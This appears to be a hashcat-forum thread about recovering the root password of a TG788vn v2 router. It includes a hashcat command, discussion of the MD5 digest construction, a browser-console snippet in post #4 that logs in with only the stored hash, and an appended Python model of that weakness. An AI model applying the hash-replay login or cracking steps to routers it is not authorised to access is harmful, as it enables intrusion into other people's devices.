Recover xDsl Router TG788vn v2 Password
#1
Hi all,
I hope that someone more skilled than me at cracking passwords can help me.

I have a TG788vn v2 xDsl router;
this router stores the password in this way:

add name=user password=_CYP2_0f08c71d768ab52da7d549b63ce5921d13e2e6a4e7a2b82b role=User hash2=86XXXXXXXXe3b204a22a1ff11ed32cc8 crypt=6hE5DKnJKEmeA

(I masked hash2, but it is the same user and password for all routers.)

Now I know that the password for user "user" is "user"; yeah, user: user, password: user.

I have found this info for another router from the same manufacturer, the model TG784n v3: md5("$user:Thomson Gateway:$password"), which, from what I saw, stores the password in the same way.

Now I don't need the password for the user "user" (which, as I said, I already know is "user"), which is a low-level user, but the one for root access, stored in the same way.

I'm really a noob. I have tried to read some posts here, and copied and tested some command lines, without success, probably because I'm doing something wrong.

As an example, I tested "cudaHashcat64.exe -a 3 -m 0 --force -1 ?u?l?d "86d646fb27e3b204a22a1ff11ed32cc8" ?1?1?1?1 -o found.txt" to see whether it would find the password "user" of the user "user", without success. So if the command doesn't work to check the password that I know, it is useless to test with the other one, sob.
#2
Funny how you masked the first hash but not the one in the command line. Side note (as it is warned): don't report issues when using --force.

Then, you're not providing enough details. I tried a few combinations with md5("$user:Thomson Gateway:$password") but didn't get any match; try with the shortest username/password to identify what the algo exactly is.

You should be able to figure out what that "crypt" thing is pretty easily.

Finally, your usage of hashcat, as seen in your command line, doesn't match what you are assuming to be the algorithm (not taking into account the salt/username).

You should do some more research I guess.
#3
(01-08-2016, 11:44 PM)Xanadrel Wrote: Then, you're not providing enough details. I tried a few combinations with md5("$user:Thomson Gateway:$password") but didn't get any match; try with the shortest username/password to identify what the algo exactly is.

You should be able to figure out what that "crypt" thing is pretty easily.


Do you think that's salt?

(01-08-2016, 11:44 PM)Xanadrel Wrote: Finally, your usage of hashcat, as seen in your command line, doesn't match what you are assuming to be the algorithm (not taking into account the salt/username).

You should do some more research I guess.

I'll try, but my knowledge of cryptography / programming is very poor...
#4
I have found around the net that with this command in the Chrome console I can enter with user XXXXXX knowing only the hash2.

Reading this, is there a way to understand the correct way to decrypt the hash?

Code:
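// MD5(), uri, nonce and qop are not defined in this snippet; it relies on
// them already existing in the page where it is run.
var user = "XXXXXX";
var hash2 = "YYYYYY";

// Same layout as an HTTP Digest response: MD5(HA1:nonce:nc:cnonce:qop:HA2),
// with hash2 in the HA1 position, nc "00000001" and cnonce "xyz".
var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce + ":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();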
#5
This hashing algorithm looks very similar to -m 11400 = SIP digest authentication (MD5)
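
Added example, not part of the thread and not the router's own code: a Python model of the construction quoted in post #1 and the response computed in post #4, showing that the stored hash2 alone is enough to pass the check, so a configuration export containing it needs the same protection as the password. The realm string comes from post #1; the account, nonce, qop and URI are constructed sample values, and the server-side check is an assumption inferred from the snippet in post #4.

```python
import hashlib
import hmac


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def stored_hash(user: str, realm: str, password: str) -> str:
    """Construction quoted in post #1; this is HA1 in RFC 2617 terms."""
    return md5_hex(f"{user}:{realm}:{password}")


def digest_response(ha1, nonce, nc, cnonce, qop, method, uri) -> str:
    """Response as built in post #4: MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def server_accepts(db_hash, response, nonce, nc, cnonce, qop, method, uri) -> bool:
    """Assumed server-side check: recompute from the stored hash, compare."""
    expected = digest_response(db_hash, nonce, nc, cnonce, qop, method, uri)
    return hmac.compare_digest(expected, response)


def demo() -> dict:
    realm = "Thomson Gateway"  # realm string from post #1
    # Constructed sample values: nonce, qop, URI, account name and password.
    params = ("constructed-nonce-01", "00000001", "xyz", "auth", "GET", "/example")
    db_hash = stored_hash("exampleuser", realm, "S3cret-example")
    # The client below holds only db_hash (as read from a config export),
    # never the password, yet its response passes the check.
    from_hash_only = digest_response(db_hash, *params)
    wrong_guess = digest_response(stored_hash("exampleuser", realm, "guess"), *params)
    return {
        "hash_only_accepted": server_accepts(db_hash, from_hash_only, *params),
        "wrong_password_accepted": server_accepts(db_hash, wrong_guess, *params),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```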